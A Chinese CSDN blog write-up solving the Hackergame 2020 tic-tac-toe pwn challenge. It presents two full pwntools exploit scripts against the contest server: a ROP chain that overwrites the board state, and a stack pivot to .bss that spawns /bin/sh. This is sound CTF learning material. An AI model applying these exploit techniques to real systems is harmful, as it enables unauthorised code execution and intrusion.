Hackergame 2020 生活在博弈树上

最新推荐文章于 2024-04-21 09:32:32 发布
最新推荐文章于 2024-04-21 09:32:32 发布
阅读量1.2k 收藏 1
点赞数 2
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/109542801
版权

这题刚进去让跟他下棋,我叭叭叭下半天,还研究半天算法,发现我根本赢不了它。扯淡。

这是一个跟他一样的井字棋网站
我让他俩对着下我都赢不了……

这是井字棋的算法分析 网上比较好的一篇

然后从二进制方向来看这道题

先检查保护

在这里插入图片描述
再拖进IDA

在这里插入图片描述
gets这里有个栈溢出,它有两个问题,热爱大地跟飞上天空,考虑两种不同的做法,一个赢游戏让它输出flag,一个自己拿到权限去找。

01 栈溢出修改棋子颜色

如小标题,因为棋子的情况存在bss段,通过栈溢出调用read函数对bss段进行一个任意写,改变棋子的颜色后返回主函数,再跟他玩,秒赢。

from pwn import*

#r = process("./tictactoe")
r = remote("202.38.93.111","10141")
context.log_level = "debug"
r.recvuntil("Please input your token: ")
r.sendline("tttttttoken")


pop_rdi = 0x4017b6
chess_addr = 0x4a8380
pop_rdx_rsi = 0x43fb99
read_addr = 0x43dba0
main_addr = 0x4022f4

payload = "(2,0)" + 'a' * (0x90 + 3) + p64(pop_rdx_rsi) + p64(1) + p64(chess_addr) + p64(pop_rdi) + p64(0) + p64(read_addr) + p64(main_addr)  
r.sendlineafter("Your turn. Input like (x,y), such as (0,1): ",payload)
r.sendlineafter("Your turn. Input like (x,y), such as (0,1): ","(2,1)")

r.recv()

payload = chr(2) + chr(2) + chr(2)  #这块不一定非要是我这样,根据程序调试时的运行写就行
r.sendline(payload)
r.sendlineafter("Your turn. Input like (x,y), such as (0,1): ","(2,2)")
r.recv()
r.interactive()

02 栈迁移

栈迁移科普链接

因为开了NX,不能在堆栈写shellcode,考虑bss
还是read函数,把栈迁移到bss,写上shellcode,调syscall就行。

from pwn import*
#r = process("./tictactoe")
r = remote("202.38.93.111","10141")
context.log_level = "debug"
r.recvuntil("Please input your token: ")

r.sendline("ttttttoken")

pop_rdi = 0x4017b6
bss_addr = 0x4a8500
pop_rdx_rsi = 0x43fb99
read_addr = 0x43dba0
leave_ret = 0x40203a
syscall_addr = 0x402bf4 
#这里插一句,syscall地址还是可以通过ROPgadget找 
#ROPgadget --binary tictactoe --only "syscall"
pop_rax = 0x43e52c

payload1 = "(2,2)" + 'a' * (0x90 - 5) + p64(bss_addr) + p64(pop_rdi) + p64(0) + p64(pop_rdx_rsi) + p64(0x70) + p64(bss_addr) + p64(read_addr) + p64(leave_ret)
#gdb.attach(r)
payload2 = "/bin/sh\x00" + p64(pop_rax) + p64(0x3b) + p64(pop_rdi) + p64(bss_addr) + p64(pop_rdx_rsi) + p64(0) + p64(0) + p64(syscall_addr)
r.recvuntil("(0,1): ")
r.sendline("(1,0)")
r.recvuntil("(0,1): ")
r.sendline(payload1)
r.recv()
r.sendline(payload2)


r.interactive()
yongbaoii
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Hackergame 2020
自强不息
02-14 485
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Hackergame 2021【web 卖瓜】
山至川的博客
10-27 2243
说实话 每次环境10分钟是真的恶心,这道题我记得因为时间截至大概在50次左右,独自解题解成了犊子。。。。。。 WP: 不接受小数,即使绕过了小数的限制但也会进入整数判断,四舍五入,换个方向考虑, 整数溢出。。。。 事实证明确实是整数溢出,经过摸索,9斤存在溢出点,说白了就是数组不再承载输入量,干脆瞎输出,主要原因是前端长度没有做严格过滤, 9223372036854775808 这段数值就是整数溢出值,输入会看到瓜的斤数直接变成了负数,负数,负数,负数,而且距离20斤有很大的一段插值,嗯...
探索HackerGame:一个开源的网络安全学习平台
最新发布
gitblog_00082的博客
04-21 368
探索HackerGame:一个开源的网络安全学习平台 项目地址:https://gitcode.com/ustclug/hackergame HackerGame 是一个由USTCLUG (University of Science and Technology of China Linux User Group)开发并维护的开源项目,旨在提供一个安全攻防的学习和实践环境。它通过一系列精心设计的挑...
【黑客游戏】学习知识又能玩游戏
weixin_49944784的博客
04-29 1850
你讲化身为一名黑客,以一个神秘人的身份进入并开始你的行动,会拥有完整的黑客工具。使用的系统也非常接近真实的系统。你在其中不仅能娱乐还能学到各种知识。
博弈与博弈树
Blackoutdragon的博客
03-26 4349
博弈 目标:使参与博弈的一方获胜
树上博弈
01-07
思路 如果两个人距离是奇数的话,只要一个人始终向另一个人接近,那么最后肯定是先走的人赢,所以只要求出奇数点对有多少个就可以了,对应的,把相邻的点状态标为不同,只有两个状态false和true,就可以使得奇数点的...
博弈树搜索算法
09-04
实现人工智能博弈系统的基本思想就是博弈树搜索,本文详细介绍了几种著名的搜索算法,包括极大极小值、负极大值、alpha-beta剪枝等。
基于Python进行博弈树搜索(人工智能实验)【100011562】
04-04
博弈树针对的是二人零和博弈的问题,二人轮流行动,行动时令自己的优势最大。二人零和博弈有如下特点: 确定性:二人的行动有多种选择,...因为二者是轮流行动的,在树的每一层让一方的评价函数取最大和最小交替进行。
博弈树(树的c实现)
12-22
下棋属于一种博弈游戏,博弈过程可以用树(博弈树)来表示。假设游戏由两个人( A 和 B )玩,开始由某个人从根结点开始走,两个人轮流走棋,每次只能走一步, 下一步棋只能选择当前结点的孩子结点,谁先走到叶子...
一篇实用的博弈树并行搜索算法论文
10-17
一篇实用的博弈树并行搜索算法论文,以中国象棋AI为例描述了基于OpenMP平台和NegaScout(PVS)算法的博弈树并行搜索算法,并以中国象棋为例做了实验。
黑客游戏(可以过一把当黑客的瘾)
10-18
可以过一把当黑客的瘾,输入一行一行的代码模拟入侵一台台超级计算机。
Hackergame 2022 wp
qq_46132256的博客
10-31 947
hackergame web 方向
Hackergame 2022 Writeup(来自一位啥都不会的萌新)
wohohohoho的博客
10-29 1855
第一次写writeup有不足之处请见谅(
中科大HackerGame2018 web题目 writeup
Smity的博客
10-26 2378
虽然很坑,但是总体来说这次还是做了很多有意思的web题,这里也只给出web题的答案 一:签到题 打开发现是要输入key值提交 但是输入后发现限制了长度,只允许输入到hackergame201 打开burp,截包,改包,发送得到flag 二:Word文档 打开题目链接发现是下载了一个officeopenXML.docx的文件 上网查阅发现这个是早期word推出的一种文件格式,其实可以改成zi...
Hackergame 2019——宇宙终极问题 everything
pigredfive的博客
10-31 302
题目截图: Since you already know the Answer to Everything, could you give me 8 integers, a, b, c, d, i, j, k and l, such that a ^ 3 + b ^ 3 + c ^ 3 + d ^ 3 = i ^ 2 + j ^ 2 + k ^ 2 + l ^ 2 = random_prim...
web 黑客游戏
503 Serivice Unavailable
08-07 2019
打开之后就发现右键被锁定了 第一关:查看源码,直接可以找到密码 第二关:提示答案在图片内,拖动图片保存,发现可疑的后缀.jpg.gif,更改后缀为.jpg.txt,可得到下一关地址or3.htm 第三关:打开之后发现密码提示,进行URL解码可得第四关地址 第四关:打开之后让输入用户名密码,bp抓包也没什么特别的,就随便输入一个,跳转到错误页面,控制台显示下一关地址 第五关:这时需要一个密...
黑客游戏网址大全 – HACK GAME COLLECTION
热门推荐
→_→
03-30 1万+
原文链接:https://www.forece.net/post/2513.htm 不知道是不是很多人像我一样,很喜欢这类黑客解谜游戏,感觉很锻炼脑子,当时黑客防线推出那款黑客游戏,有一关,我想了足足8个小时,也不觉得累。后来华夏等网站相继推出黑客游戏,我是乐此不疲。在网上也找了很多国外的黑客游戏。这里是我收集的一些黑客游戏,有网页版的,有客户端版的。对于黑客游戏,不仅仅是锻炼自己...
2020-10-31
m0_51328323的博客
10-31 128
水博客 今天又是啥也不会的一天 开始打hacker game 了 好玩且头秃 出题很有意思 社团今天讲了web方向的学习规划 要了解网站的基本架构 了解如何开发网站 如何进行网站开发 lamp架构 lnmp linux+apache+mysql+php 还有welcome的wp 了解了phpinfo()函数的作用 php不能传递数组,加密为空,&是和的意思 要好好学php啊 今天又是菜菜的一天 ...
人工智能-博弈树的搜索.pptx
05-06
"该资源是关于人工智能领域中博弈树搜索的讲解,主要涉及博弈问题的特点、博弈树的概念以及Grundy博弈的应用。通过介绍经典的人工智能棋类程序,如深蓝击败国际象棋世界冠军卡斯帕罗夫,强调了博弈树搜索算法的重要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值